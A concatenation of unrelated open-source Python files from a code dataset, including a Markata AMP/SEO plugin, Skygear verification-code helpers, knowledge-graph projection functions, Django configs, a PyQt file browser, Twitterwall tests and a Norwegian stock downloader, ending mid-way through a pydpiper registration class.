from markata.hookspec import hook_impl
if TYPE_CHECKING:
import frontmatter
from bs4.element import Tag
from urllib import request as ulreq
from PIL import ImageFile
def getsizes(uri, default_height=500, default_width=500):
    """Return (width, height) of the image at *uri* without a full download.

    Streams the response in 1 KiB chunks into a PIL ImageFile.Parser and
    returns as soon as the header yields a size.  Falls back to
    (default_width, default_height) on any error *or* when the stream ends
    before a size could be parsed.
    # https://stackoverflow.com/questions/7460218/get-image-size-without-downloading-it-in-python
    """
    try:
        with ulreq.urlopen(uri) as file:
            p = ImageFile.Parser()
            while True:
                data = file.read(1024)
                if not data:
                    break
                p.feed(data)
                if p.image:
                    return p.image.size
    except Exception:  # narrowed from BaseException so Ctrl-C still works
        pass
    # Bug fix: the original fell through and returned None when the stream
    # ended without a parsed size; always return the defaults instead.
    return (
        default_width,
        default_height,
    )
def _create_seo(
    markata: Markata, soup: BeautifulSoup, article: "frontmatter.Post"
) -> List:
    """Build the list of SEO <meta> attribute dicts for *article*.

    When the article has no description, the first ~120 characters of the
    rendered post body are used as a fallback.
    """
    # Bug fix: the original condition `desc == "" or None` evaluated as
    # `(desc == "") or None`, so a missing (None) description was never
    # detected; treat "" and None the same way.
    if article.metadata["description"] in ("", None):
        article.metadata["description"] = " ".join(
            [p.text for p in soup.find(id="post-body").find_all("p")]
        ).strip()[:120]
    seo = [
        *markata.seo,
        {
            "name": "og:author",
            "property": "og:author",
            "content": markata.config["author_name"],
        },
        {
            "name": "og:author_email",
            "property": "og:author_email",
            "content": markata.config["author_email"],
        },
        {
            "name": "og:type",
            "property": "og:type",
            "content": "website",
        },
        {
            "name": "description",
            "property": "description",
            "content": article.metadata["description"],
        },
        {
            "name": "og:description",
            "property": "og:description",
            "content": article.metadata["description"],
        },
        {
            "name": "twitter:description",
            "property": "twitter:description",
            "content": article.metadata["description"],
        },
        {
            "name": "og:title",
            "property": "og:title",
            "content": f'{article.metadata["title"]} | {markata.config["site_name"]}'[
                :60
            ],
        },
        {
            "name": "twitter:title",
            "property": "twitter:title",
            "content": f'{article.metadata["title"]} | {markata.config["site_name"]}'[
                :60
            ],
        },
        {
            "name": "og:image",
            "property": "og:image",
            "content": f'{markata.config["images_url"]}/{article.metadata["slug"]}-og.png',
        },
        {
            "name": "twitter:image",
            "property": "twitter:image",
            "content": f'{markata.config["images_url"]}/{article.metadata["slug"]}-og.png',
        },
        {
            "name": "og:image:width",
            "property": "og:image:width",
            "content": "1600",
        },
        {
            "name": "og:image:width",
            "property": "og:image:width",
            "content": "900",
        },
        {
            "name": "twitter:card",
            "property": "twitter:card",
            "content": markata.config["twitter_card"],
        },
        {
            "name": "og:site_name",
            "property": "og:site_name",
            "content": markata.config["site_name"],
        },
        {
            "name": "twitter:creator",
            "property": "twitter:creator",
            "content": markata.config["twitter_creator"],
        },
        {
            "name": "title",
            "property": "title",
            "content": article.metadata["title"],
        },
        {
            "name": "generator",
            "property": "generator",
            "content": f"markata {__version__}",
        },
    ]
    return seo
def _add_seo_tags(seo: List, article: "frontmatter.Post", soup: BeautifulSoup) -> None:
    """Append one <meta> tag per entry in *seo* to the document's <head>."""
    for entry in seo:
        tag = _create_seo_tag(entry, soup)
        soup.head.append(tag)
def _create_seo_tag(meta: dict, soup: BeautifulSoup) -> "Tag":
    """Build a new <meta> tag carrying every key/value pair from *meta*."""
    tag = soup.new_tag("meta")
    for key, value in meta.items():
        tag.attrs[key] = value
    return tag
def _clean_amp(soup: BeautifulSoup) -> None:
    """modifies soup as a side effect

    Rewrites the parsed document so it validates as AMP: strips author
    scripts (re-adding the AMP runtime), removes buttons and inline body
    styles, and replaces <img>/<iframe> elements with AMP equivalents.
    """
    # AMP forbids author JavaScript: drop all scripts, then add the runtime.
    for script in soup.find_all("script"):
        script.decompose()
    script = soup.new_tag(
        "script", attrs={"src": "https://cdn.ampproject.org/v0.js", "async": True}
    )
    soup.head.append(script)
    for button in soup.find_all("button"):
        button.decompose()
    body = soup.find("body")
    for style in body.find_all("style"):
        style.decompose()
    # NOTE(review): buttons were already removed above -- this second pass
    # looks redundant; confirm before deleting.
    for button in soup.find_all("button"):
        button.decompose()
    for iframe in soup.find_all("iframe"):
        # NOTE(review): this creates an "amp-img" tag for an iframe, though
        # the variable name suggests "amp-iframe" was intended -- confirm.
        amp_iframe = soup.new_tag(
            "amp-img",
            attrs={
                # causes amp failure if not a valid amp attribute
                **iframe.attrs,
            },
        )
        iframe.parent.insert(iframe.parent.contents.index(iframe), amp_iframe)
        iframe.decompose()
    for img in soup.find_all("img"):
        # Probe the remote image for real dimensions (AMP requires them).
        img_size = getsizes(img.attrs["src"])
        try:
            amp_img = soup.new_tag(
                "amp-img",
                attrs={
                    # causes amp failure if not a valid amp attribute
                    # **img.attrs,
                    "src": img.attrs["src"],
                    "layout": "responsive",
                    "width": img_size[0],
                    "height": img_size[1],
                },
            )
        except TypeError:
            # img_size is sometimes returning None
            amp_img = soup.new_tag(
                "amp-img",
                attrs={
                    # causes amp failure if not a valid amp attribute
                    # **img.attrs,
                    "src": img.attrs["src"],
                    "layout": "responsive",
                    "width": 500,
                    "height": 500,
                },
            )
        img.parent.insert(img.parent.contents.index(img), amp_img)
        img.decompose()
@hook_impl
def render(markata: Markata) -> None:
    """Markata render hook: finalise each article's AMP HTML.

    Injects SEO meta tags, AMP-sanitises the markup and appends
    canonical/og:url links.  Results are memoised in the markata cache,
    keyed on every input that influences the output.
    """
    with markata.cache as cache:
        for article in markata.iter_articles("add amp seo tags from seo.py"):
            # Cache key covers content and configuration so any change
            # invalidates the stored HTML.
            key = markata.make_hash(
                "amp_seo",
                "render",
                article["content_hash"],
                article.amp_html,
                markata.site_name,
                markata.url,
                article.metadata["slug"],
                markata.twitter_card,
                article.metadata["title"],
                markata.site_name,
                str(markata.seo),
            )
            html_from_cache = cache.get(key)
            if html_from_cache is None:
                soup = BeautifulSoup(article.amp_html, features="lxml")
                seo = _create_seo(markata, soup, article)
                _add_seo_tags(seo, article, soup)
                _clean_amp(soup)
                canonical_link = soup.new_tag("link")
                canonical_link.attrs["rel"] = "canonical"
                canonical_link.attrs[
                    "href"
                ] = f'{markata.url}/{article.metadata["slug"]}/'
                soup.head.append(canonical_link)
                meta_url = soup.new_tag("meta")
                meta_url.attrs["name"] = "og:url"
                meta_url.attrs["property"] = "og:url"
                meta_url.attrs["content"] = f'{markata.url}/{article.metadata["slug"]}/'
                soup.head.append(meta_url)
                # html = soup.prettify()
                html = str(soup)
                # Cached entries expire after 15 days.
                cache.add(key, html, expire=15 * 24 * 60 * 60)
            else:
                html = html_from_cache
            article.amp_html = html
| StarcoderdataPython |
6635727 | # Copyright 2016 Oursky Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import random
import secrets
import string
import uuid

from skygear.utils.db import get_table
from sqlalchemy.sql import and_, desc, func, select
def get_verify_code(c, auth_id, code):
    """
    Get a previously created verify code from database.

    :arg c: DB connection able to execute SQLAlchemy statements
    :arg auth_id: id of the user the code belongs to
    :arg code: code string to look up
    Returns the newest matching row, or None when there is no match.
    """
    code_table = get_table('_verify_code')
    # Query the table, will only return the newest code if multiple exists
    # for the same verification code
    stmt = select([code_table]) \
        .where(and_(code_table.c.auth_id == auth_id,
                    code_table.c.code == code)) \
        .order_by(desc(code_table.c.created_at))  # noqa
    result = c.execute(stmt)
    return result.fetchone()
def add_verify_code(c, auth_id, record_key, record_value, code):
    """
    Create a new verify code into the database.

    :arg record_key: name of the user record field being verified
    :arg record_value: the value (e.g. an email address) the code targets
    The code is stored unconsumed with a fresh UUID and a DB-side timestamp.
    """
    code_table = get_table('_verify_code')
    values = {
        'id': str(uuid.uuid4()),
        'auth_id': auth_id,
        'record_key': record_key,
        'record_value': record_value,
        'code': code.strip(),
        'consumed': False,
        'created_at': func.now(),
    }
    c.execute(code_table.insert().values(**values))
def set_code_consumed(c, code_id):
    """
    Mark the specified verify code as consumed.
    """
    code_table = get_table('_verify_code')
    update_stmt = (
        code_table.update()
        .values(consumed=True)
        .where(code_table.c.id == code_id)
    )
    c.execute(update_stmt)
def generate_code(code_format):
    """
    Generate a verify code according to the specified code format.

    'numeric' yields a 6-digit code; anything else an 8-character
    lowercase alphanumeric code.  Uses the ``secrets`` module because
    verification codes are security-sensitive and ``random`` is not a
    cryptographically strong source.
    Return code string.
    """
    if code_format == 'numeric':
        return ''.join(secrets.choice(string.digits) for _ in range(6))
    return ''.join(
        secrets.choice(string.digits + string.ascii_lowercase)
        for _ in range(8)
    )
def verified_flag_name(record_key):
    """
    Return the name for verified flag for the corresponding record key.
    """
    return f'{record_key}_verified'
| StarcoderdataPython |
1843386 | import torch
import torch.nn.functional as F
def projection_transH(entity, relation_norm):
    """Project *entity* onto the hyperplane with unit normal *relation_norm* (TransH)."""
    component_along_norm = torch.sum(entity * relation_norm, dim=1, keepdim=True) * relation_norm
    return entity - component_along_norm
def projection_transR(entity, proj_matrix, embedding_dim):
    """Map *entity* into relation space via its projection matrix (TransR)."""
    column_vectors = entity.view(-1, embedding_dim, 1)
    matrices = proj_matrix.view(-1, embedding_dim, embedding_dim)
    projected = torch.matmul(matrices, column_vectors)
    return projected.view(-1, embedding_dim)
def projection_transD(entity, entity_proj, relation_proj):
    """TransD projection: e + (e . e_p) * r_p, L2-normalised per row."""
    transfer = torch.sum(entity * entity_proj, dim=1, keepdim=True) * relation_proj
    return F.normalize(entity + transfer, dim=1, p=2)
| StarcoderdataPython |
3505894 | <gh_stars>0
"""Retrieve futures' settlement data from B3 exchange"""
__version__ = "0.02"
from b3_settlements.api import *
| StarcoderdataPython |
1739098 | from django.conf.urls import url
from django.contrib.auth import views as auth_views
from . import views, tables, api
app_name = 'dz'
urlpatterns = [
    # Landing page and login.
    url(r'^$', views.index, name='index'),
    url(r'^login/$', auth_views.login,
        {'template_name': 'dz/tables/login.html'}, name='login'),
    # News: list/export tables, pop-up preview with image redirect, edit form.
    url(r'^tables/news/$', tables.news_list_view, name='news-list'),
    url(r'^tables/news/export/$', tables.news_export_view, name='news-export'),
    url(r'^tables/newsbox/(?P<pk>\d+)/$', tables.newsbox_view, name='newsbox-popup'),
    url(r'^tables/newsbox/\d+/img/(?P<path>.*)$', tables.newsbox_img_redirect),
    url(r'^tables/news/(?P<pk>\d+)/$', tables.form_view,
        {'form_class': tables.NewsForm, 'next': 'news-list', 'admin_only': False},
        name='news-form'),
    # Tips: list/export tables, pop-up preview and edit form.
    url(r'^tables/tip/$', tables.tip_list_view, name='tip-list'),
    url(r'^tables/tip/export/$', tables.tip_export_view, name='tip-export'),
    url(r'^tables/tipbox/(?P<pk>\d+)/$', tables.tipbox_view, name='tipbox-popup'),
    url(r'^tables/tip/(?P<pk>\d+)/$', tables.form_view,
        {'form_class': tables.TipForm, 'next': 'tip-list', 'admin_only': False},
        name='tip-form'),
    # Crawl jobs (editing restricted to admins).
    url(r'^tables/crawl/$', tables.crawl_list_view, name='crawl-list'),
    url(r'^tables/crawl/(?P<pk>\d+)/$', tables.form_view,
        {'form_class': tables.CrawlForm, 'next': 'crawl-list', 'admin_only': True},
        name='crawl-form'),
    # Users (editing restricted to admins).
    url(r'^tables/user/$', tables.user_list_view, name='user-list'),
    url(r'^tables/user/(?P<pk>\d+)/$', tables.form_view,
        {'form_class': tables.UserForm, 'next': 'user-list', 'admin_only': True},
        name='user-form'),
    # Schedules (editing restricted to admins).
    url(r'^tables/schedule/$', tables.schedule_list_view, name='schedule-list'),
    url(r'^tables/schedule/(?P<pk>\d+)/$', tables.form_view,
        {'form_class': tables.ScheduleForm, 'next': 'schedule-list', 'admin_only': True},
        name='schedule-form'),
    # Bulk actions and the crawler's REST API.
    url(r'^tables/action/crawl/$', tables.crawl_action_view, name='crawl-action'),
    url(r'^tables/action/row/$', tables.row_action_view, name='row-action'),
    url(r'^api/crawl/job/?$', api.api_crawl_job, name='api-job'),
    url(r'^api/crawl/item/?$', api.api_crawl_item, name='api-item'),
    url(r'^api/crawl/complete/?$', api.api_crawl_complete, name='api-complete'),
]
| StarcoderdataPython |
189039 | from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from PyQt5.QtGui import *
class FileBrowser(QWidget):
    """Tree-view widget showing only *.osu / *.osr files under the CWD.

    Supports dragging and extended multi-selection so entries can be
    dragged into other widgets.
    """
    def __init__(self):
        QWidget.__init__(self)
        self.init_gui_elements()
        self.construct_gui()
        self.update_gui()
    def init_gui_elements(self):
        """Instantiate the layout, filesystem model and tree view."""
        self.layout = QVBoxLayout()
        self.file_system_model = QFileSystemModel()
        self.file_tree_view = QTreeView()
    def construct_gui(self):
        """Assemble the widget hierarchy."""
        self.setLayout(self.layout)
        self.layout.addWidget(self.file_tree_view)
    def update_gui(self):
        """Configure file filtering, drag support and column layout."""
        self.file_system_model.setNameFilters(('*.osu', '*.osr'))
        # Hide (rather than grey out) files that do not match the filters.
        self.file_system_model.setNameFilterDisables(False)
        self.file_system_model.setRootPath(QDir.currentPath())
        self.file_tree_view.setDragEnabled(True)
        self.file_tree_view.setSelectionMode(QAbstractItemView.ExtendedSelection)
        self.file_tree_view.setModel(self.file_system_model)
        self.file_tree_view.hideColumn(1) # Hide file size column
        self.file_tree_view.hideColumn(2) # Hide file type column
        self.file_tree_view.setRootIndex(self.file_system_model.index(QDir.currentPath()))
        self.file_tree_view.header().setSectionResizeMode(QHeaderView.ResizeToContents)
        self.file_tree_view.resizeColumnToContents(0) # Resize file name column
208997 | <reponame>dstlmrk/pytwitterwall
#!/usr/bin/env python3.4
# coding=utf-8
import pytest
import flexmock
from pytwitterwall import Twitterwall
from io import StringIO
import builtins
import betamax
import os
import sys
from betamax.cassette import cassette
def sanitize_token(interaction, current_cassette):
    """Betamax before_record hook: mask Authorization headers.

    Registers an <AUTH_TOKEN> placeholder for every Authorization header
    value on successful (200) interactions so real tokens never end up
    in saved cassettes.
    """
    # Exit early if the request did not return 200 OK because that's the
    # only time we want to look for Authorization-Token headers
    if interaction.data['response']['status']['code'] != 200:
        return
    token = interaction.data['request']['headers'].get('Authorization')
    # If there was no token header in the response, exit
    if token is None:
        return
    # Normalise to a list so single and multiple header values are handled
    # the same way; Betamax substitutes each placeholder on save.
    values = token if isinstance(token, list) else [token]
    for item in values:
        current_cassette.placeholders.append(
            cassette.Placeholder(placeholder='<AUTH_TOKEN>', replace=item)
        )
# Module-level Betamax setup: with real credentials (AUTH_FILE set) the
# cassettes are re-recorded; without them, only existing cassettes replay.
with betamax.Betamax.configure() as config:
    dir_path = os.path.dirname(os.path.realpath(__file__))
    # tell Betamax where to find the cassettes
    # make sure to create the directory
    config.cassette_library_dir = dir_path + '/fixtures/cassettes'
    # AUTH_FILE is set with:
    # $ export AUTH_FILE="./conf/auth.cfg"
    if 'AUTH_FILE' in os.environ:
        # If the tests are invoked with an AUTH_FILE environ variable
        API_KEY, API_SECRET = Twitterwall.get_credentials(
            os.environ['AUTH_FILE']
        )
        # Always re-record the cassetes
        # https://betamax.readthedocs.io/en/latest/record_modes.html
        config.default_cassette_options['record_mode'] = 'all'
    else:
        if os.listdir(config.cassette_library_dir) == []:
            raise Exception(
                "Your AUTH_FILE is missing and you haven't any cassettes"
            )
        API_KEY, API_SECRET = ("api-key", "api-secret")
        # Do not attempt to record sessions with bad fake token
        config.default_cassette_options['record_mode'] = 'none'
    # Filtering Sensitive Data
    config.before_record(callback=sanitize_token)
def test_get_credentials_invalid():
    """get_credentials must exit when the config file cannot be read."""
    with pytest.raises(SystemExit):
        api_key, api_secret = Twitterwall.get_credentials(".")
def test_get_credentials():
    """get_credentials reads key/secret from an ini-style [twitter] section."""
    expected_api_key = "#key"
    expected_api_secret = "#secret"
    # Patch builtins.open so the parser reads an in-memory config file.
    flexmock(builtins, open=StringIO(
        ('[twitter]\nkey={}\nsecret={}\n').format(
            expected_api_key, expected_api_secret
        )
    ))
    api_key, api_secret = Twitterwall.get_credentials(".")
    assert api_key == expected_api_key
    assert api_secret == expected_api_secret
def test__create_session_invalid(betamax_session):
    """Constructing Twitterwall with bad credentials must exit."""
    with pytest.raises(SystemExit):
        twitterwall = Twitterwall(
            api_key="#", api_secret="#", session=betamax_session
        )
def test_search_tweets(betamax_session):
    """A (recorded) tweet search returns HTTP 200 with a list of statuses."""
    twitterwall = Twitterwall(
        session=betamax_session,
        api_key=API_KEY,
        api_secret=API_SECRET
    )
    response = twitterwall.search_tweets("python")
    assert response.status_code == 200
    assert isinstance(response.json()['statuses'], list)
def test_get_indices():
    """get_indices extracts the [start, end] pair from an entity dict."""
    expected_first_index = 8
    expected_second_index = 12
    entity = {
        "user_id": 1,
        "indices": [expected_first_index, expected_second_index],
        "index": 5
    }
    first_index, second_index = Twitterwall.get_indices(entity)
    assert expected_first_index == first_index
    assert expected_second_index == second_index
@pytest.mark.parametrize(
    ['text', 'entity', 'expected_tweet'],
    [
        (
            "my test #tweet #python",
            {"indices": [8, 14]},
            "my test <a href=\"/search/tweet\">#tweet</a> #python"
        ),
        (
            "#python",
            {"indices": [0, 7]},
            "<a href=\"/search/python\">#python</a>"
        )
    ],
)
def test_add_hashtag(text, entity, expected_tweet):
    """add_hashtag wraps the hashtag at entity['indices'] in a search link."""
    tweet = Twitterwall.add_hashtag(text, entity)
    assert expected_tweet == tweet
@pytest.mark.parametrize(
    ['text', 'entity', 'expected_tweet'],
    [
        (
            "my test @user #python",
            {"indices": [8, 13]},
            "my test <a href=\"/search/user\">@user</a> #python"
        ),
        (
            "@python",
            {"indices": [0, 7]},
            "<a href=\"/search/python\">@python</a>"
        )
    ],
)
def test_add_user_mention(text, entity, expected_tweet):
    """Mentions should be wrapped in search links like hashtags.

    NOTE(review): this calls Twitterwall.add_hashtag rather than
    add_user_mention -- it looks like a copy-paste slip; confirm which
    method it should exercise.
    """
    tweet = Twitterwall.add_hashtag(text, entity)
    assert expected_tweet == tweet
def test_add_url():
    """add_url replaces the display URL with a link to its expanded URL."""
    tweet = "my test with url python.cz #python"
    entity = {
        "indices": [17, 26],
        "expanded_url": "http://www.python.cz",
        "display_url": "python.cz"
    }
    expected_tweet = (
        "my test with url"
        " <a href=\"http://www.python.cz\">python.cz</a> #python"
    )
    edited_tweet = Twitterwall.add_url(tweet, entity)
    assert expected_tweet == edited_tweet
def test_add_media():
    """add_media appends a linked <img> for the media entity to the tweet."""
    tweet = "my media test"
    entity = {
        "indices": [13, 13],
        "expanded_url": "http://www.python.cz",
        "media_url": "http://youtube.com/23mg4"
    }
    expected_tweet = (
        "my media test"
        "<br><br><a href=\"http://www.python.cz\">"
        "<img src=\"http://youtube.com/23mg4\"></a>"
    )
    edited_tweet = Twitterwall.add_media(tweet, entity)
    assert expected_tweet == edited_tweet
@pytest.fixture
def testapp(betamax_session):
    """Flask test client wired to the betamax-recorded HTTP session."""
    from pytwitterwall import app
    app.config['TESTING'] = True
    app.config['session'] = betamax_session
    return app.test_client()
def test_title(testapp):
    """The landing page renders with the TwitterWall heading."""
    response = testapp.get('/')
    assert 200 == response.status_code
    assert '<h1>TwitterWall</h1>' in response.data.decode('utf-8')
def test_wall(testapp):
    """The search wall page renders for a recorded query."""
    response = testapp.get('/search/hroncok/')
    assert 200 == response.status_code
    assert '<h1>twitterwall</h1>' in response.data.decode('utf-8')
| StarcoderdataPython |
8059707 | # Generated by Django 3.2.5 on 2021-07-07 03:10
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('Configuration', '0002_auto_20210702_2224'),
]
operations = [
migrations.AddField(
model_name='paymentmethod',
name='environment',
field=models.CharField(blank=True, choices=[('d', 'Development'), ('p', 'Production')], default='d', help_text='Required for PayPal', max_length=1),
),
]
| StarcoderdataPython |
1781736 | <reponame>FredrikBakken/Norwegian-Stocks-Rating
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
'''
### DOWNLOAD SCRIPT
###
### PURPOSE
### The purpose of the download script is to download all current stock data from the different norwegian markets,
### then storing the relevant data into the stocks database.
###
### @Author: <NAME>
### Email: fredrik.bakken(at)gmail.com
### Website: https://www.fredrikbakken.no/
### Github: https://github.com/FredrikBakken
###
### Last update: 15.10.2017
'''
import os
import csv
import shutil
import requests
import contextlib
from db import db_insert_stocks, db_search_stocks
#filename = 'data/tmp-stocks/stocks.json'
def download_stocks():
    """Download current stock lists for the Oslo Bors, Oslo Axess and Merkur
    markets from netfonds.no, store new tickers in the stocks database, and
    remove the temporary download directory.

    Returns:
        True on completion.
    """
    directory = 'data/tmp-stocks/'
    filename = directory + 'stocks.json'

    # Netfonds exchange code and the human-readable source name stored per row.
    markets = [['OSE', 'Oslo Børs'], ['OAX', 'Oslo Axess'], ['MERK', 'Merkur']]

    # exist_ok avoids the check-then-create race of the original code.
    os.makedirs(directory, exist_ok=True)

    # Delete any old stocks overview file; ignore it if none exists.
    with contextlib.suppress(FileNotFoundError):
        os.remove(filename)

    # Reuse one HTTP session for all market downloads.
    with requests.Session() as s:
        for market_tag, market_name in markets:
            # Download the tab-separated stock table for this market.
            # NOTE: '&sectors=' restores the original query parameter; it had
            # been corrupted to '§ors=' by an HTML-entity mojibake ('&sect').
            download = s.get('http://www.netfonds.no/quotes/kurs.php?exchange='
                             + market_tag
                             + '&sec_types=&sectors=&ticks=&table=tab&sort=alphabetic')
            decode = download.content.decode('iso-8859-1')
            csr = csv.reader(decode.splitlines(), delimiter='\t')
            stocklist = list(csr)
            stocklist.pop(0)  # drop the header row

            # Append each stock to the overview file, tagging the row with
            # its market name as the last column.
            with open(filename, 'a', newline='') as out:
                writer = csv.writer(out, delimiter=',')
                for row in stocklist:
                    print("Download ticker: " + row[1])
                    row.append(market_name)
                    writer.writerow(row)

    print('Updated stocks data has been downloaded to: ' + filename)

    # Store stocks into the database.
    store_stocks(filename)

    # Remove temporary stock data storage.
    if os.path.exists(directory):
        shutil.rmtree(directory)

    return True
def store_stocks(filename):
    """Read the downloaded stocks file and insert any new, non-test tickers
    into the stocks database.

    Args:
        filename: Path to the comma-separated stocks file written by
            ``download_stocks()``.

    Returns:
        True on completion.
    """
    # 'r' replaces the 'rU' mode (deprecated, removed in Python 3.11);
    # newline='' lets the csv module handle line endings. csv.reader also
    # parses quoted fields correctly, which naive line.split(",") would break.
    with open(filename, 'r', newline='') as stocks_file:
        for cells in csv.reader(stocks_file):
            if len(cells) < 14:
                continue  # skip malformed/short rows defensively
            name = str(cells[0])
            ticker = str(cells[1])
            source = str(cells[13].strip())

            # Skip Oslo Bors test tickers before touching the database.
            if 'OBTEST' not in ticker:
                exist_ticker = db_search_stocks(ticker)
                if not exist_ticker:
                    db_insert_stocks(ticker, name, source)

    print('New stocks has been stored in the database.')
    return True
# Setting starting method
# Script entry point: download and store all stocks when run directly.
if __name__ == "__main__":
    download_stocks()
| StarcoderdataPython |
6483718 | <filename>src/board_test.py<gh_stars>0
#!/usr/bin/env python
import unittest2
from board import PlayerType, Move, Board, InvalidMoveException, BoardSpec
__author__ = '<NAME>'
class SmallBoardTest(unittest2.TestCase):
    """Win detection on a minimal 3x3 board where 3 in a row wins."""

    def setUp(self):
        # Fresh 3x3 board (win length 3) for every test.
        self.test_board = Board(BoardSpec(3, 3, 3))

    def test_diagonal_win(self):
        """Three circles along the anti-diagonal form a winning line."""
        for col, row in ((2, 0), (1, 1)):
            self.test_board.place_move(Move(col, row, PlayerType.CIRCLE))
        final = Move(0, 2, PlayerType.CIRCLE)
        self.test_board.place_move(final)
        assert self.test_board.is_winning_move(final) == True
class BoardTest(unittest2.TestCase):
    """Placement and win-detection tests on a 10x10 board with win length 5."""

    def setUp(self):
        # Fresh 10x10 board (5 in a row wins) before each test.
        board_spec = BoardSpec(10, 10, 5)
        self.test_board = Board(board_spec)

    def test_placing_circle_move(self):
        # A placed circle must be readable back from the same field.
        self.test_board.place_move(Move(0, 0, PlayerType.CIRCLE))
        assert(self.test_board.get_field(0, 0) == PlayerType.CIRCLE)

    def test_placing_cross_move(self):
        # A placed cross must be readable back from the same field.
        self.test_board.place_move(Move(0, 0, PlayerType.CROSS))
        assert(self.test_board.get_field(0, 0) == PlayerType.CROSS)

    def test_placing_invalid_cross_move(self):
        # Placing onto an occupied field must raise InvalidMoveException.
        self.test_board.place_move(Move(0, 0, PlayerType.CROSS))
        with self.assertRaises(InvalidMoveException):
            self.test_board.place_move(Move(0, 0, PlayerType.CROSS))

    def test_placing_invalid_circle_move(self):
        # Same occupied-field rule applies to circles.
        self.test_board.place_move(Move(0, 0, PlayerType.CIRCLE))
        with self.assertRaises(InvalidMoveException):
            self.test_board.place_move(Move(0, 0, PlayerType.CIRCLE))

    def test_placing_move_outside_board(self):
        # Coordinates equal to width/height are one past the edge -> invalid.
        test_move = Move(self.test_board.width, self.test_board.height,
                         PlayerType.CIRCLE)
        with self.assertRaises(InvalidMoveException):
            self.test_board.place_move(test_move)

    def test_is_winning_move_vertical(self):
        # Four in a column, then the fifth completes a vertical win.
        test_moves = [Move(0, i, PlayerType.CIRCLE) for i in range(4)]
        for move in test_moves:
            self.test_board.place_move(move)
        winning_move = Move(0, 4, PlayerType.CIRCLE)
        self.test_board.place_move(winning_move)
        self.assertTrue(self.test_board.is_winning_move(winning_move))

    def test_is_winning_move_horizontal(self):
        # Four in a row, then the fifth completes a horizontal win.
        test_moves = [Move(i, 0, PlayerType.CIRCLE) for i in range(4)]
        for move in test_moves:
            self.test_board.place_move(move)
        winning_move = Move(4, 0, PlayerType.CIRCLE)
        self.test_board.place_move(winning_move)
        self.assertTrue(self.test_board.is_winning_move(winning_move))

    def test_is_winning_move_diagonal_trivial(self):
        # Main-diagonal win completed at its far end.
        test_moves = [Move(i, i, PlayerType.CIRCLE) for i in range(4)]
        for move in test_moves:
            self.test_board.place_move(move)
        winning_move = Move(4, 4, PlayerType.CIRCLE)
        self.test_board.place_move(winning_move)
        self.assertTrue(self.test_board.is_winning_move(winning_move))

    def test_is_winning_move_diagonal_complex(self):
        # Anti-diagonal win where the completing move fills an interior gap.
        test_moves = [Move(x, y, PlayerType.CIRCLE) for x, y in [(5, 5), (7, 3), (8, 2), (9, 1)]]
        for move in test_moves:
            self.test_board.place_move(move)
        winning_move = Move(6, 4, PlayerType.CIRCLE)
        self.test_board.place_move(winning_move)
        self.assertTrue(self.test_board.is_winning_move(winning_move))

    def test_is_winning_move_horizontal_inter(self):
        # Horizontal win completed by filling the middle gap of the line.
        test_moves = [Move(i, 0, PlayerType.CIRCLE) for i in range(2)]
        for move in test_moves:
            self.test_board.place_move(move)
        test_moves = [Move(i, 0, PlayerType.CIRCLE) for i in range(3, 5)]
        for move in test_moves:
            self.test_board.place_move(move)
        winning_move = Move(2, 0, PlayerType.CIRCLE)
        self.test_board.place_move(winning_move)
        self.assertTrue(self.test_board.is_winning_move(winning_move))

    def test_is_winning_move_vertical_inter(self):
        # Vertical win completed by filling the middle gap of the line.
        test_moves = [Move(0, i, PlayerType.CIRCLE) for i in range(2)]
        for move in test_moves:
            self.test_board.place_move(move)
        test_moves = [Move(0, i, PlayerType.CIRCLE) for i in range(3, 5)]
        for move in test_moves:
            self.test_board.place_move(move)
        winning_move = Move(0, 2, PlayerType.CIRCLE)
        self.test_board.place_move(winning_move)
        self.assertTrue(self.test_board.is_winning_move(winning_move))

    def test_is_winning_move_diagonal_inter(self):
        # Diagonal win completed by filling the middle gap of the line.
        test_moves = [Move(i, i, PlayerType.CIRCLE) for i in range(2)]
        for move in test_moves:
            self.test_board.place_move(move)
        test_moves = [Move(i, i, PlayerType.CIRCLE) for i in range(3, 5)]
        for move in test_moves:
            self.test_board.place_move(move)
        winning_move = Move(2, 2, PlayerType.CIRCLE)
        self.test_board.place_move(winning_move)
        self.assertTrue(self.test_board.is_winning_move(winning_move))

    def test_is_not_winning_move(self):
        # A single isolated move must not be reported as winning.
        not_winning_move = Move(2, 2, PlayerType.CIRCLE)
        self.test_board.place_move(not_winning_move)
        self.assertFalse(self.test_board.is_winning_move(not_winning_move))

    def tearDown(self):
        self.test_board = None
| StarcoderdataPython |
1625319 | <filename>lists/admin.py
from django.contrib import admin
from lists.models import List
class ListAdmin(admin.ModelAdmin):
    """Django admin configuration for List: list columns, filters and search."""
    list_display = ('name', 'description', 'type', 'user', 'privacy')
    list_filter = ('type', 'user', 'privacy')
    search_fields = ('name', 'description')

# Register the model with its admin options so it appears in the admin site.
admin.site.register(List, ListAdmin)
| StarcoderdataPython |
9660534 | #!/usr/bin/env python
from pydpiper.pipeline import CmdStage, Pipeline
from atoms_and_modules.registration_functions import isFileHandler
import atoms_and_modules.registration_functions as rf
from os.path import abspath, basename, splitext, join
from os import curdir
import pydpiper.file_handling as fh
import sys
import fnmatch
import re
import copy
class mincANTS(CmdStage):
    """Pipeline stage that runs a mincANTS (SyN) non-linear registration from
    a source volume to a target volume.

    Inputs may be RegistrationPipeFH file handlers (blurred inputs, output
    transform, log file and target mask are then derived automatically) or
    plain filename strings, in which case ``output`` must be a full path.
    """
    def __init__(self,
                 inSource,
                 inTarget,
                 output=None,
                 logFile=None,
                 defaultDir="transforms",
                 blur=[-1, 0.056],
                 gradient=[False, True],
                 target_mask=None, #ANTS only uses one mask
                 similarity_metric=["CC", "CC"],
                 weight=[1,1],
                 iterations="100x100x100x150",
                 radius_or_histo=[3,3],
                 transformation_model="SyN[0.1]",
                 regularization="Gauss[2,1]",
                 useMask=True):
        # NOTE(review): the list-typed defaults (blur, gradient, weight, ...)
        # are shared mutable defaults; safe only while no caller mutates them.
        CmdStage.__init__(self, None) #don't do any arg processing in superclass
        try:
